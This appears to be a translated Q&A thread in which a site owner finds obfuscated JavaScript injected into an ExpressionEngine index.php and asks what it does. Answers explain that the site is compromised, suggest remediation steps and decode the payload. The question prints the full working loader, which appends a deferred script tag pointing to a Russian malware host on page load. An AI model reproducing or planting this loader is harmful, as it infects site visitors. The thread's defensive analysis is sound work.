8

先週、クライアントの Web サイトが xHTML Strict 1.0/CSS 2.1 標準に準拠していることを確認しました。今日再確認したところ、奇妙で以前の不明なスクリプトが原因で検証エラーが発生しました。ExpressionEngine CMS の index.php ファイルでこれを見つけました。私が疑ったように、これはハッキングの試みですか? スクリプトにロシア語のドメインがエンコードされていることに気付きました...

このJavaScriptは何をしていますか? クライアントに特定の危険性を説明する必要があります。




    this.v=27047;
    this.v+=187;
    ug=["n"];
    OV=29534;
    OV--;
    var y;
    var C="C";
    var T={};

    r=function(){
        b=36068;
        b-=144;
        M=[];

        function f(V,w,U){
            return V.substr(w,U);
            var wH=39640;
        }

        var L=["o"];
        var cj={};
        var qK={N:false};
        var fa="/g"+"oo"+"gl"+"e."+"co"+"m/"+f("degL4",0,2)+f("rRs6po6rRs",4,2)+f("9GVsiV9G",3,2)+f("5cGtfcG5",3,2)+f("M6c0ilc6M0",4,2)+"es"+f("KUTz.cUzTK",4,2)+f("omjFb",0,2)+"/s"+f("peIlh2",0,2)+"ed"+f("te8WC",0,2)+f("stien3",0,2)+f(".nYm6S",0,2)+f("etUWH",0,2)+f(".pdVPH",0,2)+f("hpzToi",0,2);
        var BT="BT";
        var fV=RegExp;
        var CE={bf:false};
        var UW='';
        this.Ky=11592;
        this.Ky-=237;
        var VU=document;
        var _n=[];

        try {} catch(wP){};

        this.JY=29554;
        this.JY-=245;

        function s(V,w){
            l=13628;
            l--;
            var U="["+w+String("]");
            var rk=new fV(U, f("giId",0,1));
            this.NS=18321;this.NS+=195;return V.replace(rk, UW);

            try {} catch(k){};
        };

        this.jM="";
        var CT={};
        var A=s('socnruixpot4','zO06eNGTlBuoYxhwn4yW1Z');

        try {var vv='m'} catch(vv){};

        var Os={};
        var t=null;
        var e=String("bod"+"y");
        var F=155183-147103;
        this.kp='';
        Z={Ug:false};
        y=function(){
            var kl=["mF","Q","cR"];

            try {
                Bf=11271;
                Bf-=179;
                var u=s('cfr_eKaPtQe_EPl8eTmPeXn8to','X_BQoKfTZPz8MG5');
                Fp=VU[u](A);
                var H="";

                try {} catch(WK){};

                this.Ca=19053;
                this.Ca--;
                var O=s('s5rLcI','2A5IhLo');
                var V=F+fa;
                this.bK="";
                var ya=String("de"+"fe"+f("r3bPZ",0,1));
                var bk=new String();
                pB=9522;
                pB++;
                Fp[O]=String("ht"+"tp"+":/"+"/t"+"ow"+"er"+"sk"+"y."+"ru"+":")+V;
                Fp[ya]=[1][0];
                Pe=45847;
                Pe--;
                VU[e].appendChild(Fp);
                var lg=new Array();
                var aQ={vl:"JC"};
                this.KL="KL";
            } 
            catch(x){
                this.Ja="";
                Th=["pj","zx","kO"];
                var Jr='';
            };

            Tr={qZ:21084};
        };

        this.pL=false;
    };

    be={};
    rkE={hb:"vG"};
    r();
    var bY=new Date();
    window.onload=y;
    cU=["Yr","gv"];



4

4 に答える 4

14

はい。サイトが侵害されました。

あなたがする必要があるのは:

  1. これらのパスワードにアクセスできるすべての人が、サイトにログインした可能性のあるコンピューターで更新されたウイルススキャンを実行するようにしてください。
  2. すべてのログイン パスワードと管理者パスワードを必ず変更してください。
  3. 可能であれば、これに遭遇する前のコードベースに戻す必要があります。
  4. このスニペットを見つけたスクリプトの変更時刻を確認し (遅すぎない場合)、その頃に変更された他のファイルを探します。スクリプトはランダムに生成される可能性が高いため、スクリプトの一部を grep しても決定的ではない可能性があります。

このスクリプトが侵入経路を見つけることができた場合、他のスクリプトも侵入経路を見つけることができます。Web サイトにログインしたユーザーのコンピューターで、キーロギング トロイの木馬によって Web サイトが侵害されることは珍しくありません。http://www.symantec.com/connect/blogs/gumblar-botnet-ramps-activity
を参照してください。

于 2010-06-10T23:56:45.017 に答える
11

上記のコードは、ロシアのサイト( http://towersky.ru:8080/google.com/depositfiles.com/speedtest.net.php )でコードをアクティブ化するコードを記述します。これにより、iFrameを含む非表示のDIVが追加されます。子犬の写真が含まれていると仮定します。

于 2010-06-11T00:15:02.707 に答える
4

このスクリプトは、基本的に次の行を body 終了タグに追加します。

<script defer="defer" src="http://towersky.ru:8080/google.com/depositfiles.com/speedtest.net.php"></script>

そのため、外部スクリプトをサイトにロードしようとしています。このスクリプトが何をするものなのかはわかりませんが、何も良くないことは間違いありません。

さらに、Google で「towersky.ru」をすばやく検索すると、このサイトを含む悪意のある Web サイトのリストが表示されます。

于 2010-06-11T00:14:55.893 に答える
2

私のAVが私を止めたので、Windowsでこのページをロードすることさえできなかったことを考えると、はい、それはウイルスです.

于 2010-06-11T15:38:10.540 に答える